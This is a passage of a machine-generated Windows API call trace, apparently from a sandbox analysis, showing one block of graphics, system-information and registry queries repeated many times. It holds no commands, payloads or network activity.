x2=0, y2=0) returned 0x1045aa8 [0091.209] CombineRgn (hrgnDst=0x1045aa7, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=1) returned 1 [0091.209] CombineRgn (hrgnDst=0x1045aa8, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=4) returned 2 [0091.209] CreateSolidBrush (color=0xff) returned 0x2105aa6 [0091.209] CreateSolidBrush (color=0xff0000) returned 0x1105aa9 [0091.209] DeleteObject (ho=0x1105aa9) returned 1 [0091.209] DeleteObject (ho=0xea0401dc) returned 1 [0091.209] DeleteObject (ho=0xec0401d9) returned 1 [0091.209] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.209] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.209] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.209] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.209] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.209] BeginPath (hdc=0x0) returned 0 [0091.209] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.209] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.209] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.209] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.209] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.209] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.209] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.209] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.209] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb0401dc [0091.209] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed0401d9 [0091.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aaa [0091.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aab [0091.209] CombineRgn (hrgnDst=0x1045aaa, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=1) returned 1 [0091.209] CombineRgn (hrgnDst=0x1045aab, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=4) returned 2 [0091.209] CreateSolidBrush (color=0xff) returned 0x2105aa9 [0091.209] CreateSolidBrush (color=0xff0000) returned 0x1105aac [0091.210] DeleteObject (ho=0x1105aac) returned 1 [0091.210] DeleteObject (ho=0xed0401d9) returned 1 [0091.210] DeleteObject (ho=0xeb0401dc) returned 1 [0091.210] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.210] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.210] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.210] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.210] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.210] BeginPath (hdc=0x0) returned 0 [0091.210] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.210] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.210] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.210] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.210] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.210] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.210] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee0401d9 [0091.210] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec0401dc [0091.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aad [0091.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aae [0091.210] CombineRgn (hrgnDst=0x1045aad, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=1) returned 1 [0091.210] CombineRgn (hrgnDst=0x1045aae, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=4) returned 2 [0091.210] CreateSolidBrush (color=0xff) returned 0x2105aac [0091.210] CreateSolidBrush (color=0xff0000) returned 0x1105aaf [0091.210] DeleteObject (ho=0x1105aaf) returned 1 [0091.210] DeleteObject (ho=0xec0401dc) returned 1 [0091.210] DeleteObject (ho=0xee0401d9) returned 1 [0091.210] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.210] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.211] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.211] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.211] BeginPath (hdc=0x0) returned 0 [0091.211] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.211] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.211] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.211] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.211] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.211] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed0401dc [0091.211] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef0401d9 [0091.211] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab0 [0091.211] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab1 [0091.211] CombineRgn (hrgnDst=0x1045ab0, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=1) returned 1 [0091.211] CombineRgn (hrgnDst=0x1045ab1, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=4) returned 2 [0091.211] CreateSolidBrush (color=0xff) returned 0x2105aaf [0091.211] CreateSolidBrush (color=0xff0000) returned 0x1105ab2 [0091.211] DeleteObject (ho=0x1105ab2) returned 1 [0091.211] DeleteObject (ho=0xef0401d9) returned 1 [0091.211] DeleteObject (ho=0xed0401dc) returned 1 [0091.211] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.211] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.211] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.211] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.211] BeginPath (hdc=0x0) returned 0 [0091.212] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.212] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.212] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.212] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.212] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.212] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.212] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf00401d9 [0091.212] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee0401dc [0091.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab3 [0091.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab4 [0091.212] CombineRgn (hrgnDst=0x1045ab3, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=1) returned 1 [0091.212] CombineRgn (hrgnDst=0x1045ab4, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=4) returned 2 [0091.212] CreateSolidBrush (color=0xff) returned 0x2105ab2 [0091.212] CreateSolidBrush (color=0xff0000) returned 0x1105ab5 [0091.212] DeleteObject (ho=0x1105ab5) returned 1 [0091.212] DeleteObject (ho=0xee0401dc) returned 1 [0091.212] DeleteObject (ho=0xf00401d9) returned 1 [0091.212] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.212] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.212] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.212] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.212] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.212] BeginPath (hdc=0x0) returned 0 [0091.212] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.212] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.212] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.212] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.213] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.213] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef0401dc [0091.213] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf10401d9 [0091.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab6 [0091.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab7 [0091.213] CombineRgn (hrgnDst=0x1045ab6, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=1) returned 1 [0091.213] CombineRgn (hrgnDst=0x1045ab7, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=4) returned 2 [0091.213] CreateSolidBrush (color=0xff) returned 0x2105ab5 [0091.213] CreateSolidBrush (color=0xff0000) returned 0x1105ab8 [0091.213] DeleteObject (ho=0x1105ab8) returned 1 [0091.213] DeleteObject (ho=0xf10401d9) returned 1 [0091.213] DeleteObject (ho=0xef0401dc) returned 1 [0091.213] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.213] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.213] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.213] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.213] BeginPath (hdc=0x0) returned 0 [0091.213] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.213] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.213] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.213] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.213] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf20401d9 [0091.213] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf00401dc [0091.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ab9 [0091.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045aba [0091.213] CombineRgn (hrgnDst=0x1045ab9, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=1) returned 1 [0091.213] CombineRgn (hrgnDst=0x1045aba, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=4) returned 2 [0091.214] CreateSolidBrush (color=0xff) returned 0x2105ab8 [0091.214] CreateSolidBrush (color=0xff0000) returned 0x1105abb [0091.214] DeleteObject (ho=0x1105abb) returned 1 [0091.214] DeleteObject (ho=0xf00401dc) returned 1 [0091.214] DeleteObject (ho=0xf20401d9) returned 1 [0091.214] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.214] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.214] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.214] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.214] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.214] BeginPath (hdc=0x0) returned 0 [0091.214] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.214] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.214] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.214] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.214] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.214] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.214] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.214] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf10401dc [0091.214] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf30401d9 [0091.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045abc [0091.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045abd [0091.214] CombineRgn (hrgnDst=0x1045abc, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=1) returned 1 [0091.214] CombineRgn (hrgnDst=0x1045abd, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=4) returned 2 [0091.214] CreateSolidBrush (color=0xff) returned 0x2105abb [0091.214] CreateSolidBrush (color=0xff0000) returned 0x1105abe [0091.214] DeleteObject (ho=0x1105abe) returned 1 [0091.214] DeleteObject (ho=0xf30401d9) returned 1 [0091.214] DeleteObject (ho=0xf10401dc) returned 1 [0091.214] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.214] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.214] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.214] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.214] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.214] BeginPath (hdc=0x0) returned 0 [0091.214] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.214] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.215] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.215] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.215] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf40401d9 [0091.215] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf20401dc [0091.215] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045abf [0091.215] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac0 [0091.215] CombineRgn (hrgnDst=0x1045abf, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=1) returned 1 [0091.215] CombineRgn (hrgnDst=0x1045ac0, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=4) returned 2 [0091.215] CreateSolidBrush (color=0xff) returned 0x2105abe [0091.215] CreateSolidBrush (color=0xff0000) returned 0x1105ac1 [0091.215] DeleteObject (ho=0x1105ac1) returned 1 [0091.215] DeleteObject (ho=0xf20401dc) returned 1 [0091.215] DeleteObject (ho=0xf40401d9) returned 1 [0091.215] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.215] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.215] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.215] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.215] BeginPath (hdc=0x0) returned 0 [0091.215] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.215] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.215] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.215] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.215] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf30401dc [0091.215] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf50401d9 [0091.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac2 [0091.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac3 [0091.216] CombineRgn (hrgnDst=0x1045ac2, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=1) returned 1 [0091.216] CombineRgn (hrgnDst=0x1045ac3, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=4) returned 2 [0091.216] CreateSolidBrush (color=0xff) returned 0x2105ac1 [0091.216] CreateSolidBrush (color=0xff0000) returned 0x1105ac4 [0091.216] DeleteObject (ho=0x1105ac4) returned 1 [0091.216] DeleteObject (ho=0xf50401d9) returned 1 [0091.216] DeleteObject (ho=0xf30401dc) returned 1 [0091.216] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, 